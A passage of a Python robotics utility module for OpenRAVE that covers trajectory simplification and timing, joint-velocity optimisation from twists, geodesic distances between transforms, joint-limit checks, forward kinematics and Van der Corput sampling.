@param traj input trajectory that will be simplified
@returns output trajectory of timed linear segments
"""
from scipy import interpolate
if traj.GetDuration() != 0.0:
raise ValueError("Cannot handle timed trajectories yet!")
if traj.GetNumWaypoints() < 2:
return traj
cspec = traj.GetConfigurationSpecification()
dofs = robot.GetActiveDOFIndices()
idxs = range(traj.GetNumWaypoints())
joints = [robot.GetJointFromDOFIndex(d) for d in dofs]
times = numpy.array(
idxs if not traj.GetDuration() else
numpy.cumsum([cspec.ExtractDeltaTime(traj.GetWaypoint(i),
robot, dofs) for i in idxs]))
values = numpy.array(
[cspec.ExtractJointValues(traj.GetWaypoint(i), robot, dofs)
for i in idxs])
resolutions = numpy.array([j.GetResolution(0) for j in joints])
# Start with an extrema set of the first to the last waypoint.
mask = numpy.zeros(times.shape, dtype=bool)
mask[[0, -1]] = True
for _ in idxs:
# Create new interpolation set from current extrema.
f = interpolate.interp1d(times[mask], values[mask, :],
axis=0, kind='linear')
errors = numpy.abs(f(times) - values)
# TODO: Can this be a single call?
# Find the extrema in the remaining waypoints.
max_err_idx = numpy.argmax(errors, axis=0)
max_err_vals = numpy.max(errors, axis=0)
# Add any extrema that deviated more than joint resolution.
max_err_idx = max_err_idx[max_err_vals > resolutions]
mask[max_err_idx] = True
# If none deviated more than joint resolution, the set is complete.
        if len(max_err_idx) == 0:
break
# Return a new reduced trajectory.
import openravepy
reduced_traj = openravepy.RaveCreateTrajectory(traj.GetEnv(),
traj.GetXMLId())
reduced_traj.Init(cspec)
for (new_idx, old_idx) in enumerate(mask.nonzero()[0]):
reduced_traj.Insert(new_idx, traj.GetWaypoint(old_idx))
return reduced_traj
class Recorder(object):
MPEG = 13
def __init__(self, env, filename, width=1920, height=1080, codec=MPEG):
self.env = env
self.filename = filename
self.width = width
self.height = height
self.codec = codec
self.module = openravepy.RaveCreateModule(env, 'ViewerRecorder')
env.Add(self.module)
    def __enter__(self):
        self.start()
        return self
    def __exit__(self, type, value, traceback):
        self.stop()
def start(self):
cmd = ('Start {width:d} {height:d} 30 '
'codec {codec:d} timing realtime filename {filename:s}\n'
'viewer {viewer:s}'
.format(width=self.width, height=self.height,
codec=self.codec, filename=self.filename,
viewer=self.env.GetViewer().GetName()))
self.module.SendCommand(cmd)
def stop(self):
self.module.SendCommand('Stop')
class AlignmentToken(object):
def __init__(self, env, child_frame, extents,
pose=None, period=0.05, parent_frame='world'):
self.child_frame = child_frame
self.parent_frame = parent_frame
self.period = period
with env:
self.body = openravepy.RaveCreateKinBody(env, '')
aabbs = numpy.concatenate(([0., 0., 0.], extents)).reshape((1, 6))
self.body.InitFromBoxes(aabbs, True)
self.body.SetName('frame:' + child_frame)
if pose is not None:
self.body.SetTransform(pose)
env.Add(self.body, True)
import tf
self.broadcaster = tf.TransformBroadcaster()
self.update()
def update(self):
import rospy
with self.body.GetEnv():
or_pose = self.body.GetTransform()
or_quaternion = openravepy.quatFromRotationMatrix(or_pose)
position = tuple(or_pose[0:3, 3])
orientation = (or_quaternion[1], or_quaternion[2],
or_quaternion[3], or_quaternion[0])
self.broadcaster.sendTransform(position, orientation, rospy.Time.now(),
self.child_frame, self.parent_frame)
self.timer = threading.Timer(self.period, self.update)
self.timer.daemon = True
self.timer.start()
def destroy(self):
self.body.GetEnv().Remove(self.body)
self.body = None
class Timer(object):
def __init__(self, message=None):
self.message = message
self.start = 0
def __enter__(self):
if self.message is not None:
logging.info('%s started execution.', self.message)
self.start = time.time()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
if self.message is not None:
logging.info('%s executed in %.5f seconds.',
self.message, self.get_duration())
def stop(self):
self.end = time.time()
def get_duration(self):
return self.end - self.start
class Watchdog(object):
"""
Calls specified function after duration, unless reset/stopped beforehand
@param timeout_duration how long to wait before calling handler
@param handler function to call after timeout_duration
@param args for handler
@param kwargs for handler
"""
def __init__(self, timeout_duration, handler, args=(), kwargs={}):
self.timeout_duration = timeout_duration
self.handler = handler
self.handler_args = args
self.handler_kwargs = kwargs
self.thread_checking_time = threading.Thread(
target=self._check_timer_loop)
self.timer_thread_lock = threading.Lock()
self.start_time = time.time()
self.canceled = False
self.thread_checking_time.start()
def reset(self):
"""
Resets the timer.
Causes the handler function to be called after the next timeout
        duration is reached. Also restarts the timer thread if it has exited.
"""
with self.timer_thread_lock:
if self.canceled or not self.thread_checking_time.is_alive():
self.thread_checking_time = threading.Thread(
target=self._check_timer_loop)
self.thread_checking_time.start()
self.start_time = time.time()
self.canceled = False
def stop(self):
"""
Stop the watchdog, so it will not call handler
"""
with self.timer_thread_lock:
self.canceled = True
def _check_timer_loop(self):
"""
Internal function for timer thread to loop
If elapsed time has passed, calls the handler function
        Exits if the watchdog was canceled, or the handler was called
"""
while True:
with self.timer_thread_lock:
if self.canceled:
break
elapsed_time = time.time() - self.start_time
if elapsed_time > self.timeout_duration:
self.handler(*self.handler_args, **self.handler_kwargs)
with self.timer_thread_lock:
self.canceled = True
break
else:
time.sleep(self.timeout_duration - elapsed_time)
def quadraticPlusJointLimitObjective(dq, J, dx, q, q_min, q_max,
delta_joint_penalty=5e-1,
lambda_dqdist=0.01,
*args):
"""
Quadratic and joint-limit-avoidance objective for SciPy's optimization.
@param dq joint velocity
@param J Jacobian
@param dx desired twist
@param q current joint values
@param q_min lower joint limit
@param q_max upper joint limit
    @param delta_joint_penalty distance from limit with penalty
    @param lambda_dqdist weighting for joint limit penalty
"""
# Compute quadratic distance part.
objective, gradient = quadraticObjective(dq, J, dx)
# Add penalty for joint limit avoidance.
qdiff_lower = delta_joint_penalty - (q - q_min)
qdiff_upper = delta_joint_penalty - (q_max - q)
dq_target = [diff_lower if diff_lower > 0. else
(-diff_upper if diff_upper > 0. else 0.)
for diff_lower, diff_upper in zip(qdiff_lower, qdiff_upper)]
objective += lambda_dqdist * 0.5 * sum(numpy.square(dq - dq_target))
gradient += lambda_dqdist * (dq - dq_target)
return objective, gradient
def quadraticObjective(dq, J, dx, *args):
"""
Quadratic objective function for SciPy's optimization.
@param dq joint velocity
@param J Jacobian
@param dx desired twist
@return objective the objective function
@return gradient the analytical gradient of the objective
"""
error = (numpy.dot(J, dq) - dx)
objective = 0.5 * numpy.dot(numpy.transpose(error), error)
gradient = numpy.dot(numpy.transpose(J), error)
return objective, gradient
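# Pure-numpy sanity check of the objective/gradient (illustrative, no robot
# required): with dq = 0 the residual is -dx, so the cost is 0.5*||dx||^2.
#   J = numpy.eye(2)
#   dx = numpy.array([1.0, 0.0])
#   dq = numpy.zeros(2)
#   quadraticObjective(dq, J, dx)   # -> (0.5, array([-1.,  0.]))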
def ComputeJointVelocityFromTwist(
robot, twist, objective=quadraticObjective, dq_init=None,
joint_limit_tolerance=3e-2, joint_velocity_limits=None):
"""
Computes the optimal joint velocity given a twist by formulating
the problem as a quadratic optimization with box constraints and
using SciPy's L-BFGS-B solver.
@params robot the robot
@params twist the desired twist in se(3)
with float('NaN') for dimensions we don't care about
@params objective optional objective function to optimize
defaults to quadraticObjective
@params dq_init optional initial guess for optimal joint velocity
defaults to robot.GetActiveDOFVelocities()
@params joint_velocity_limits override the robot's joint velocity limit;
defaults to robot.GetActiveDOFMaxVel()
    @params joint_limit_tolerance if less than this distance to a joint
limit, velocity is bounded in that direction to 0
@return dq_opt optimal joint velocity
@return twist_opt actual achieved twist
can be different from desired twist due to constraints
"""
manip = robot.GetActiveManipulator()
robot.SetActiveDOFs(manip.GetArmIndices())
if joint_velocity_limits is None:
joint_velocity_limits = robot.GetActiveDOFMaxVel()
elif isinstance(joint_velocity_limits, float):
joint_velocity_limits = numpy.array(
[numpy.PINF] * robot.GetActiveDOF())
if len(joint_velocity_limits) != robot.GetActiveDOF():
raise ValueError(
'Joint velocity limits has incorrect length:'
' Expected {:d}, got {:d}.'.format(
robot.GetActiveDOF(), len(joint_velocity_limits)))
elif (joint_velocity_limits <= 0.).any():
raise ValueError('One or more joint velocity limit is not positive.')
jacobian_spatial = manip.CalculateJacobian()
jacobian_angular = manip.CalculateAngularVelocityJacobian()
jacobian = numpy.vstack((jacobian_spatial, jacobian_angular))
rows = [i for i, x in enumerate(twist) if math.isnan(x) is False]
twist_active = twist[rows]
jacobian_active = jacobian[rows, :]
bounds = numpy.column_stack(
(-joint_velocity_limits, joint_velocity_limits))
# Check for joint limits
q_curr = robot.GetActiveDOFValues()
q_min, q_max = robot.GetActiveDOFLimits()
dq_bounds = [
(0., max) if q_curr[i] <= q_min[i] + joint_limit_tolerance else
(min, 0.) if q_curr[i] >= q_max[i] - joint_limit_tolerance else
(min, max) for i, (min, max) in enumerate(bounds)
]
if dq_init is None:
dq_init = robot.GetActiveDOFVelocities()
opt = scipy.optimize.fmin_l_bfgs_b(
objective, dq_init, fprime=None,
args=(jacobian_active, twist_active, q_curr, q_min, q_max),
bounds=dq_bounds, approx_grad=False
)
dq_opt = opt[0]
twist_opt = numpy.dot(jacobian, dq_opt)
return dq_opt, twist_opt
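# Illustrative use (a sketch; assumes `robot` is an OpenRAVE robot with an
# active manipulator): move the end effector along +x at 2 cm/s while leaving
# the rotational components unconstrained (NaN = "don't care"):
#   twist = numpy.array([0.02, 0.0, 0.0, numpy.nan, numpy.nan, numpy.nan])
#   dq, twist_actual = ComputeJointVelocityFromTwist(robot, twist)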
def GeodesicTwist(t1, t2):
"""
Computes the twist in global coordinates that corresponds
to the gradient of the geodesic distance between two transforms.
@param t1 current transform
@param t2 goal transform
@return twist in se(3)
"""
trel = numpy.dot(numpy.linalg.inv(t1), t2)
trans = numpy.dot(t1[0:3, 0:3], trel[0:3, 3])
omega = numpy.dot(t1[0:3, 0:3],
openravepy.axisAngleFromRotationMatrix(
trel[0:3, 0:3]))
return numpy.hstack((trans, omega))
def GeodesicError(t1, t2):
"""
Computes the error in global coordinates between two transforms.
@param t1 current transform
@param t2 goal transform
@return a 4-vector of [dx, dy, dz, solid angle]
"""
trel = numpy.dot(numpy.linalg.inv(t1), t2)
trans = numpy.dot(t1[0:3, 0:3], trel[0:3, 3])
omega = openravepy.axisAngleFromRotationMatrix(trel[0:3, 0:3])
angle = numpy.linalg.norm(omega)
return numpy.hstack((trans, angle))
def AngleBetweenQuaternions(quat1, quat2):
"""
Compute the angle between two quaternions.
    Returns a value in the range [0, pi].
"""
theta = numpy.arccos(2.0 * (quat1.dot(quat2))**2 - 1.0)
return theta
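# Example: the identity quaternion versus a half-turn about z (OpenRAVE
# quaternions are ordered [qw, qx, qy, qz]):
#   AngleBetweenQuaternions(numpy.array([1., 0., 0., 0.]),
#                           numpy.array([0., 0., 0., 1.]))   # -> pi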
def AngleBetweenRotations(rot1, rot2):
"""
Compute the angle between two 3x3 rotation matrices.
    Returns a value in the range [0, pi].
"""
quat1 = openravepy.quatFromRotationMatrix(rot1)
quat2 = openravepy.quatFromRotationMatrix(rot2)
return AngleBetweenQuaternions(quat1, quat2)
def GeodesicDistance(t1, t2, r=1.0):
"""
Computes the geodesic distance between two transforms
@param t1 current transform
@param t2 goal transform
@param r in units of meters/radians converts radians to meters
"""
error = GeodesicError(t1, t2)
error[3] = r * error[3]
return numpy.linalg.norm(error)
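# Example: two poses that differ only by a 3-4-5 translation (no rotation):
#   T0 = numpy.eye(4)
#   T1 = numpy.eye(4)
#   T1[0:3, 3] = [3.0, 4.0, 0.0]
#   GeodesicDistance(T0, T1)   # -> 5.0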
def GetGeodesicDistanceBetweenTransforms(T0, T1, r=1.0):
"""
Wrapper, to match GetGeodesicDistanceBetweenQuaternions()
Calculate the geodesic distance between two transforms, being
gd = norm( relative translation + r * axis-angle error )
@param t1 current transform
@param t2 goal transform
@param r in units of meters/radians converts radians to meters
"""
return GeodesicDistance(T0, T1, r)
def GetEuclideanDistanceBetweenPoints(p0, p1):
"""
Calculate the Euclidean distance (L2 norm) between two vectors.
"""
sum = 0.0
for i in xrange(len(p0)):
sum = sum + (p0[i] - p1[i]) * (p0[i] - p1[i])
return numpy.sqrt(sum)
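# Example:
#   GetEuclideanDistanceBetweenPoints([0.0, 0.0, 0.0], [3.0, 4.0, 0.0])  # -> 5.0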
def GetEuclideanDistanceBetweenTransforms(T0, T1):
"""
Calculate the Euclidean distance between the translational
component of two 4x4 transforms.
(also called L2 or Pythagorean distance)
"""
p0 = T0[0:3, 3] # Get the x,y,z translation from the 4x4 matrix
p1 = T1[0:3, 3]
return GetEuclideanDistanceBetweenPoints(p0, p1)
def GetMinDistanceBetweenTransformAndWorkspaceTraj(T, traj, dt=0.01):
"""
Find the location on a workspace trajectory which is closest
to the specified transform.
@param numpy.matrix T: A 4x4 transformation matrix.
@param openravepy.Trajectory traj: A timed workspace trajectory.
@param float dt: Resolution at which to sample along the trajectory.
    @return (float, float, numpy.matrix) (min_dist, t_loc, T_loc):
            the minimum distance, the time value along the timed
            trajectory, and the transform at that time.
"""
if not IsTimedTrajectory(traj):
raise ValueError("Trajectory must have timing information.")
if not IsTrajectoryTypeIkParameterizationTransform6D(traj):
raise ValueError("Trajectory is not a workspace trajectory, it "
"must have configuration specification of "
"openravepy.IkParameterizationType.Transform6D")
def _GetError(t):
T_curr = openravepy.matrixFromPose(traj.Sample(t)[0:7])
error = GetEuclideanDistanceBetweenTransforms(T, T_curr)
return error
min_dist = numpy.inf
t_loc = 0.0
T_loc = None
# Iterate over the trajectory
t = 0.0
duration = traj.GetDuration()
while t < duration:
error = _GetError(t)
if error < min_dist:
min_dist = error
t_loc = t
t = t + dt
# Also check the end-point
error = _GetError(duration)
if error < min_dist:
min_dist = error
        t_loc = duration
T_loc = openravepy.matrixFromPose(traj.Sample(t_loc)[0:7])
return (min_dist, t_loc, T_loc)
def FindCatkinResource(package, relative_path):
"""
Find a Catkin resource in the share directory or
the package source directory. Raises IOError
if resource is not found.
@param relative_path Path relative to share or package source directory
@param package The package to search in
@return Absolute path to resource
"""
from catkin.find_in_workspaces import find_in_workspaces
paths = find_in_workspaces(project=package, search_dirs=['share'],
path=relative_path, first_match_only=True)
if paths and len(paths) == 1:
return paths[0]
else:
raise IOError('Loading resource "{:s}" failed.'.format(
relative_path))
def IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx):
"""
Check if robot is at a particular waypoint in a trajectory.
This function examines the current DOF values of the specified
robot and compares these values to the first waypoint of the
specified trajectory. If the DOF values specified in the trajectory
differ by less than the DOF resolution of the specified joint/axis
then it will return True. Otherwise, it returns False.
NOTE: This is used in ExecuteTrajectory(),
IsAtTrajectoryStart(), and
IsAtTrajectoryEnd()
@param robot: The robot whose active DOFs will be checked.
@param trajectory: The trajectory containing the waypoint
to be checked.
@returns: True The robot is at the desired position.
              False One or more joints differ by more than DOF resolution.
"""
if trajectory.GetNumWaypoints() == 0:
raise ValueError('Trajectory has 0 waypoints!')
cspec = trajectory.GetConfigurationSpecification()
needs_base = HasAffineDOFs(cspec)
needs_joints = HasJointDOFs(cspec)
if needs_base and needs_joints:
raise ValueError('Trajectories with affine and joint DOFs are '
'not supported')
if trajectory.GetEnv() != robot.GetEnv():
raise ValueError('The environment attached to the trajectory '
'does not match the environment attached to '
'the robot in IsAtTrajectoryStart().')
if needs_base:
rtf = robot.GetTransform()
doft = (openravepy.DOFAffine.X |
openravepy.DOFAffine.Y |
openravepy.DOFAffine.RotationAxis)
curr_pose = openravepy.RaveGetAffineDOFValuesFromTransform(rtf, doft)
start_transform = numpy.eye(4)
waypoint = trajectory.GetWaypoint(0)
start_t = cspec.ExtractTransform(start_transform, waypoint, robot)
traj_start = openravepy.RaveGetAffineDOFValuesFromTransform(
start_t, doft)
# Compare translation distance
trans_delta_value = abs(curr_pose[:2] - traj_start[:2])
trans_resolution = robot.GetAffineTranslationResolution()[:2]
if trans_delta_value[0] > trans_resolution[0] or \
trans_delta_value[1] > trans_resolution[1]:
return False
# Compare rotation distance
rot_delta_value = abs(wrap_to_interval(curr_pose[2] - traj_start[2]))
rot_res = robot.GetAffineRotationAxisResolution()[2] # Rot about z?
if rot_delta_value > rot_res:
return False
else:
# Get joint indices used in the trajectory,
# and the joint positions at this waypoint
waypoint = trajectory.GetWaypoint(waypoint_idx)
dof_indices, _ = cspec.ExtractUsedIndices(robot)
goal_config = cspec.ExtractJointValues(waypoint, robot, dof_indices)
# Return false if any joint deviates too much
return IsAtConfiguration(robot, goal_config, dof_indices)
return True
def IsAtTrajectoryStart(robot, trajectory):
"""
Check if robot is at the configuration specified by
the FIRST waypoint in a trajectory.
"""
waypoint_idx = 0
return IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx)
def IsAtTrajectoryEnd(robot, trajectory):
"""
Check if robot is at the configuration specified by
the LAST waypoint in a trajectory.
"""
waypoint_idx = trajectory.GetNumWaypoints() - 1
return IsAtTrajectoryWaypoint(robot, trajectory, waypoint_idx)
def IsAtConfiguration(robot, goal_config, dof_indices=None):
"""
Check if robot's joints have reached a desired configuration.
If the DOF indices are not specified, the robot's active DOF
will be used.
@param robot The robot object.
@param goal_config The desired configuration, an array of joint
positions.
@param dof_indices The joint index numbers.
@return boolean Returns True if joints are at goal position,
within DOF resolution.
"""
# If DOF indices not specified, use the active DOF by default
if dof_indices is None:
dof_indices = robot.GetActiveDOFIndices()
# Get current position of joints
with robot.GetEnv():
joint_values = robot.GetDOFValues(dof_indices)
dof_resolutions = robot.GetDOFResolutions(dof_indices)
# If any joint is not at the goal position, return False
for i in xrange(0, len(goal_config)):
# Get the axis index for this joint, which is 0
# for revolute joints or 0-2 for spherical joints.
joint = robot.GetJointFromDOFIndex(dof_indices[i])
axis_idx = dof_indices[i] - joint.GetDOFIndex()
# Use OpenRAVE method to check the configuration
# difference value1-value2 for axis i,
# taking into account joint limits and wrapping
# of continuous joints.
delta_value = abs(joint.SubtractValue(joint_values[i], goal_config[i],
axis_idx))
if delta_value > dof_resolutions[i]:
return False
# If all joints match the goal, return True
return True
def IsTimedTrajectory(trajectory):
"""
Returns True if the trajectory is timed.
This function checks whether a trajectory has a valid `deltatime` group,
indicating that it is a timed trajectory.
@param trajectory: an OpenRAVE trajectory
@returns: True if the trajectory is timed, False otherwise
"""
cspec = trajectory.GetConfigurationSpecification()
empty_waypoint = numpy.zeros(cspec.GetDOF())
return cspec.ExtractDeltaTime(empty_waypoint) is not None
def IsJointSpaceTrajectory(traj):
"""
Check if trajectory is a joint space trajectory.
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
cspec = traj.GetConfigurationSpecification()
if cspec.GetGroupFromName("joint_values"):
return True
except openravepy.openrave_exception:
pass
return False
def IsWorkspaceTrajectory(traj):
"""
Check if trajectory is a workspace trajectory.
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
return IsTrajectoryTypeIkParameterizationTransform6D(traj)
def IsTrajectoryTypeIkParameterization(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization:
Transform6d
Rotation3D
Translation3D
Direction3D
Ray4D
Lookat3D
TranslationDirection5D
TranslationXY2D
TranslationXYOrientation3D
TranslationLocalGlobal6D
TranslationXAxisAngle4D
TranslationYAxisAngle4D
TranslationZAxisAngle4D
TranslationXAxisAngleZNorm4D
TranslationYAxisAngleXNorm4D
TranslationZAxisAngleYNorm4D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
cspec = traj.GetConfigurationSpecification()
if cspec.GetGroupFromName("ikparam_values"):
return True
except openravepy.openrave_exception:
pass
return False
def IsTrajectoryTypeIkParameterizationTransform6D(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization.Transform6D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
IKP_type = openravepy.IkParameterizationType.Transform6D
# The IKP type must be passed as a number
group_name = "ikparam_values {0}".format(int(IKP_type))
if traj.GetConfigurationSpecification().GetGroupFromName(group_name):
return True
except openravepy.openrave_exception:
pass
return False
def IsTrajectoryTypeIkParameterizationTranslationDirection5D(traj):
"""
Check if trajectory has a configuration specification
of type IkParameterization.TranslationDirection5D
@param openravepy.Trajectory traj: A path or trajectory.
@return bool result: Returns True or False.
"""
try:
IKP_type = openravepy.IkParameterizationType.TranslationDirection5D
group_name = "ikparam_values {0}".format(int(IKP_type))
if traj.GetConfigurationSpecification().GetGroupFromName(group_name):
return True
except openravepy.openrave_exception:
pass
return False
def ComputeEnabledAABB(kinbody):
"""
Returns the AABB of the enabled links of a KinBody.
@param kinbody: an OpenRAVE KinBody
@returns: AABB of the enabled links of the KinBody
"""
from numpy import NINF, PINF
from openravepy import AABB
min_corner = numpy.array([PINF] * 3)
max_corner = numpy.array([NINF] * 3)
for link in kinbody.GetLinks():
if link.IsEnabled():
link_aabb = link.ComputeAABB()
center = link_aabb.pos()
half_extents = link_aabb.extents()
min_corner = numpy.minimum(center - half_extents, min_corner)
max_corner = numpy.maximum(center + half_extents, max_corner)
center = (min_corner + max_corner) / 2.
half_extents = (max_corner - min_corner) / 2.
return AABB(center, half_extents)
def UntimeTrajectory(trajectory, env=None):
"""
Returns an untimed copy of the provided trajectory.
This function strips the DeltaTime group from a timed trajectory to create
an untimed trajectory.
@param trajectory: an OpenRAVE trajectory
@returns: an untimed copy of the provided trajectory.
"""
cspec = trajectory.GetConfigurationSpecification()
cspec.RemoveGroups('deltatime', True)
waypoints = trajectory.GetWaypoints(0, trajectory.GetNumWaypoints(), cspec)
path = openravepy.RaveCreateTrajectory(env or trajectory.GetEnv(),
trajectory.GetXMLId())
path.Init(cspec)
path.Insert(0, waypoints)
return path
def ComputeUnitTiming(robot, traj, env=None):
"""
Compute the unit velocity timing of a path or trajectory.
@param robot: robot whose DOFs should be considered
@param traj: path or trajectory
@param env: environment to create the output trajectory in; defaults to the
same environment as the input trajectory
@returns: trajectory with unit velocity timing
"""
from openravepy import RaveCreateTrajectory
if env is None:
env = traj.GetEnv()
old_cspec = traj.GetConfigurationSpecification()
dof_indices, _ = old_cspec.ExtractUsedIndices(robot)
with robot.CreateRobotStateSaver():
robot.SetActiveDOFs(dof_indices)
new_cspec = robot.GetActiveConfigurationSpecification('linear')
new_cspec.AddDeltaTimeGroup()
new_traj = RaveCreateTrajectory(env, '')
new_traj.Init(new_cspec)
dof_values_prev = None
for i in range(traj.GetNumWaypoints()):
old_waypoint = traj.GetWaypoint(i)
dof_values = old_cspec.ExtractJointValues(
old_waypoint, robot, dof_indices)
if i == 0:
deltatime = 0.
else:
deltatime = numpy.linalg.norm(dof_values - dof_values_prev)
dof_values_prev = dof_values
new_waypoint = numpy.zeros(new_cspec.GetDOF())
new_cspec.InsertJointValues(new_waypoint, dof_values,
robot, dof_indices, 0)
new_cspec.InsertDeltaTime(new_waypoint, deltatime)
new_traj.Insert(i, new_waypoint)
return new_traj
def ComputeGeodesicUnitTiming(traj, env=None, alpha=1.0):
"""
Compute the geodesic unit velocity timing of a workspace path or
trajectory, also called a path length parameterization.
The path length is calculated as the sum of all segment lengths,
where each segment length = norm( delta_translation^2 +
alpha^2*delta_orientation^2 )
Note: Currently only linear velocity interpolation is supported,
however OpenRAVE does allow you to specify quadratic
interpolation.
@param traj: Workspace path or trajectory
@param env: Environment to create the output trajectory in, defaults
to the same environment as the input trajectory.
@param alpha: Weighting for delta orientation.
@returns: A workspace trajectory with unit velocity timing.
"""
if not IsTrajectoryTypeIkParameterizationTransform6D(traj):
raise ValueError("Trajectory is not a workspace trajectory, it "
"must have configuration specification of "
"openravepy.IkParameterizationType.Transform6D")
num_waypoints = traj.GetNumWaypoints()
if num_waypoints <= 1:
raise ValueError("Trajectory needs more than 1 waypoint.")
if env is None:
env = traj.GetEnv()
ikparam = openravepy.IkParameterization
ikparam_type = openravepy.IkParameterizationType
# Create a new workspace trajectory with the same spec
# as the old one
new_traj = openravepy.RaveCreateTrajectory(env, '')
new_cspec = ikparam.GetConfigurationSpecificationFromType(
ikparam_type.Transform6D, 'linear')
new_cspec.AddDeltaTimeGroup()
new_traj.Init(new_cspec)
# Get the current pose of the end effector
    # Note: an OpenRAVE pose is ordered [qw,qx,qy,qz, tx,ty,tz];
    # only the first 7 values (the pose) are used here.
P_ee_prev = traj.GetWaypoint(0)[range(7)]
for i in range(num_waypoints):
P_ee = traj.GetWaypoint(i)[range(7)] # Get 7 pose values
# Compute the translation delta
p0 = P_ee_prev[4:7] # Get the x,y,z translation
p1 = P_ee[4:7]
delta_translation = numpy.sqrt(numpy.sum((p0 - p1)**2))
# Compute the orientation delta
        q0 = P_ee_prev[0:4]  # Get the qw,qx,qy,qz rotation
q1 = P_ee[0:4]
delta_angle = AngleBetweenQuaternions(q0, q1)
dist = numpy.sqrt(delta_translation**2 + (alpha**2) * (delta_angle**2))
if i == 0:
deltatime = 0.0
else:
deltatime = dist
P_ee_prev = P_ee
# Insert a new waypoint (1x7 pose, velocity)
values = numpy.append(P_ee, [deltatime])
new_traj.Insert(i, values)
return new_traj
def CheckJointLimits(robot, q, deterministic=None):
"""
Check if a configuration is within a robot's joint position limits.
If outside limits, this procedure throws an exception
of type JointLimitError.
@param openravepy.robot robot: The robot.
@param list q: List or array of joint positions.
"""
from prpy.planning.exceptions import JointLimitError
q_limit_min, q_limit_max = robot.GetActiveDOFLimits()
active_dof_indices = robot.GetActiveDOFIndices()
if len(q) != len(active_dof_indices):
raise ValueError('The number of joints in the configuration q '
'is not equal to the number of active DOF.')
lower_position_violations = (q < q_limit_min)
if lower_position_violations.any():
index = lower_position_violations.nonzero()[0][0]
raise JointLimitError(
robot,
dof_index=active_dof_indices[index],
dof_value=q[index],
dof_limit=q_limit_min[index],
description='position',
deterministic=deterministic)
upper_position_violations = (q > q_limit_max)
if upper_position_violations.any():
index = upper_position_violations.nonzero()[0][0]
raise JointLimitError(
robot,
dof_index=active_dof_indices[index],
dof_value=q[index],
dof_limit=q_limit_max[index],
description='position',
deterministic=deterministic)
def GetForwardKinematics(robot, q, manipulator=None, frame=None):
"""
Get the forward kinematics for a specific joint configuration,
relative to the OpenRAVE world frame.
@param openravepy.robot robot: The robot object.
@param list q: List or array of joint positions.
@param manipulator
@param string frame: Get the end effector transform relative to a
specific frame e.g. '/right/wam_base'
@returns T_ee: The pose of the end effector (or last link in the
serial chain) as a 4x4 matrix.
"""
if manipulator is None:
manipulator = robot.GetActiveManipulator()
T_ee = None
# Save the robot state
sp = openravepy.Robot.SaveParameters
robot_saver = robot.CreateRobotStateSaver(sp.LinkTransformation)
with robot_saver:
robot.SetActiveDOFValues(q)
T_ee = manipulator.GetEndEffectorTransform()
# Robot state is restored
if frame is not None:
link = robot.GetLink(frame)
if link is None:
raise ValueError('Failed to get link \'{:s}\''.format(frame))
T_ref_frame = link.GetTransform()
T_ee = numpy.dot(numpy.linalg.inv(T_ref_frame), T_ee)
return T_ee
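# Illustrative use (a sketch; assumes `robot` is an OpenRAVE robot and `q` is
# a configuration for its active DOFs):
#   T_ee = GetForwardKinematics(robot, q)
#   p_ee = T_ee[0:3, 3]   # end-effector position in the world frame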
def ConvertIntToBinaryString(x, reverse=False):
"""
Convert an integer to a binary string.
Optionally reverse the output string, which is
required for producing a Van Der Corput sequence.
@param int x: The number to be converted.
@param bool reverse: If True, the output string will be reversed.
@returns string: A binary number as a string.
"""
if type(x) != int:
raise ValueError('Input number must be an integer')
if reverse:
return ''.join(reversed(bin(x)[2:]))
return ''.join(bin(x)[2:])
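# Examples:
#   ConvertIntToBinaryString(6)                 # -> '110'
#   ConvertIntToBinaryString(6, reverse=True)   # -> '011'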
def VanDerCorputSequence(lower=0.0, upper=1.0, include_endpoints=True):
"""
Generate the binary Van der Corput sequence, where each value
is a dyadic fraction re-scaled to the desired range.
For example, on the interval [0,1], the first 5 values of
the Van der Corput sequence are:
    [0.0, 1.0, 0.5, 0.25, 0.75]
@param float lower: The first value of the range of the sequence.
@param float upper: The last value of the range of the sequence.
@param bool include_endpoints: If True, the output sequence will
include the value 'lower' and the
value 'upper'.
If False, these endpoint values
will not be returned.
@returns generator: A sequence of float values.
"""
from itertools import count, chain
if include_endpoints is True:
endpoints = (0.0, 1.0)
else:
endpoints = []
# Get a sequence of reversed binary numbers:
# '1', '01', '11', '001', '101', '011', '111', '0001', ....
#
# Note: count(1) is a generator, starting at 1, making steps of 1.
reverse_binary_seq = (ConvertIntToBinaryString(x, True) for x in count(1))
# From the reversed binary sequence, generate the Van der Corput
# sequence, for which: 0.0 < x < 1.0 (the end-points are excluded)
# 0.5, 0.25, 0.75, 0.125, 0.625, 0.375, 0.875, 0.0625, ....
#
# Note: int(x,2) converts the binary string (base 2) to an integer.
raw_seq = (float(int(x, 2)) / (2**len(x)) for x in reverse_binary_seq)
# Scale the Van der Corput sequence across the desired range
# and optionally add the end-points.
scale = float(upper - lower)
return (scale * val + lower for val in chain(endpoints, raw_seq))
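# Example: the first five values on [0, 1] with the endpoints included.
#   from itertools import islice
#   list(islice(VanDerCorputSequence(0.0, 1.0), 5))
#   # -> [0.0, 1.0, 0.5, 0.25, 0.75]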
def SampleTimeGenerator(start, end, step=1, include_endpoints=False, **kwargs):
"""
Generate a linear sequence of values from start to end, with
specified step size. Works with int or float values.
The end value is also returned if it's more than half the
distance from the previously returned value.
For example, on the interval [0.0,5.0], the sequence is:
[0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
@param float start: The start value of the sequence.
@param float end: The last value of the sequence.
@param float step: The step-size between values.
@param bool include_endpoints: If true, include the start and end value
@returns generator: A sequence of float values.
"""
if end <= start:
raise ValueError("The 'end' value must be greater than "
"the 'start' value.")
if not (step > 0):
raise ValueError("The 'step' value must be positive.")
t = start
prev_t = 0.0
while t <= numpy.floor(end):
yield t
prev_t = t
t = t + step
if (end - float(prev_t)) > (step / 2.0):
yield float(end)
prev_t = end
if include_endpoints and (end - float(prev_t)) > 1e-6:
yield float(end)
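# Example: the end value is appended when it lies more than half a step
# beyond the last regular sample.
#   list(SampleTimeGenerator(0.0, 4.6, step=1.0))
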